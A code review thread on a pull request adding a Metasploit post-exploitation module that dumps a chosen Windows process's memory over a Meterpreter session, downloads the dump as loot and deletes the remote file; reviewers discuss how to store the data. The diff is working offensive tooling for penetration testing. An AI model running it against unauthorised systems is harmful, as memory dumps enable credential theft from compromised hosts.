modules/post/windows/gather/memory_dump.rb

```diff
@@ -0,0 +1,142 @@
+    error = result['GetLastError']
+    unless error == 0
+      fail_with(Msf::Module::Failure::PayloadFailed, "Unable to open process: #{result['ErrorMessage']}")
+    end
+    result['return']
+  end
+
+  def create_file
+    path = datastore['DUMP_PATH']
+    result = session.railgun.kernel32.CreateFileW(
+      path,
+      'GENERIC_READ | GENERIC_WRITE',
+      0,
+      nil,
+      'CREATE_ALWAYS',
+      0,
+      0
+    )
+    error = result['GetLastError']
+    unless error == 0
+      fail_with(Msf::Module::Failure::PayloadFailed, "Unable to create file: #{result['ErrorMessage']}")
+    end
+    result['return']
+  end
+
+  def dump_process
+    target_pid = datastore['PID'].to_i
+    name = nil
+    client.sys.process.processes.each do |p|
+      if p['pid'] == target_pid
+        name = p['name']
+      end
+    end
+    fail_with(Msf::Module::Failure::PayloadFailed, "Could not find process #{target_pid}") unless name
+    print_status("Dumping memory for #{name}")
+
+    railgun = session.railgun
+
+    if datastore['DUMP_TYPE'] == 'standard'
+      # MiniDumpWithDataSegs | MiniDumpWithHandleData | MiniDumpWithIndirectlyReferencedMemory
+      # | MiniDumpWithProcessThreadData | MiniDumpWithPrivateReadWriteMemory | MiniDumpWithThreadInfo
+      dump_flags = 0x1 | 0x4 | 0x40 | 0x100 | 0x200 | 0x1000
+    elsif datastore['DUMP_TYPE'] == 'full'
+      # MiniDumpWithFullMemory
+      dump_flags = 0x2
+    end
+
+    process_handle = nil
+    file_handle = nil
+    begin
+      process_handle = get_process_handle
+      file_handle = create_file
+      result = railgun.dbghelp.MiniDumpWriteDump(process_handle,
+                                                 target_pid,
+                                                 file_handle,
+                                                 dump_flags,
+                                                 nil,
+                                                 nil,
+                                                 nil)
+      unless result['return']
+        fail_with(Msf::Module::Failure::PayloadFailed, "Minidump failed: #{result['ErrorMessage']}")
+      end
+    ensure
+      railgun.kernel32.CloseHandle(process_handle) if process_handle
+      railgun.kernel32.CloseHandle(file_handle) if file_handle
+    end
+
+    path = datastore['DUMP_PATH']
+
+    begin
+      meterp_temp = Tempfile.new('meterp')
+      meterp_temp.binmode
+      temp_path = meterp_temp.path
+      src_stat = client.fs.filestat.new(path)
+      print_status("Downloading minidump (#{Filesize.new(src_stat.size).pretty})")
+      session.fs.file.download_file(temp_path, path)
+      dump_contents = File.read(temp_path, mode: 'rb')
+      loot_path = store_loot('windows.process.dump', 'application/octet-stream', session, dump_contents)
+      print_good("Memory dump stored at #{loot_path}")
+      ::File.delete(temp_path)
```

Comment:
I'm just wondering, would it be possible to read the remote file and store it to the loot without having to downloading it to a local temporary file? Not a big deal, but maybe a possible optimization.

Reply:
Yeah, the store_loot API didn't seem to support that use case (expects you to give it the data when you call it), but I guess I can just give it an empty string and then write directly to that file. I've taken that approach in a new commit - let me know what you think.

Reply:
Modifying the file stored locally in the loot is usually not recommended. `store_loot` also stores the data in the database and, in this case, even if the local file is correct, the database will not have the data.
I was thinking about something along these lines:
```ruby
    begin
      src_stat = client.fs.filestat.new(path)
      print_status("Downloading minidump (#{Filesize.new(src_stat.size).pretty})")
      dump_data = read_file(path)
      loot_path = store_loot('windows.process.dump', 'application/octet-stream', session, dump_data)
      print_good("Memory dump stored at #{loot_path}")
    ensure
      print_status('Deleting minidump from disk')
      rm_f(path)
    end
```
`read_file` and `rm_f` are helper methods from the `Msf::Post::File` mixin, which will need to be included:
```ruby
class MetasploitModule < Msf::Post
  include Msf::Post::File
```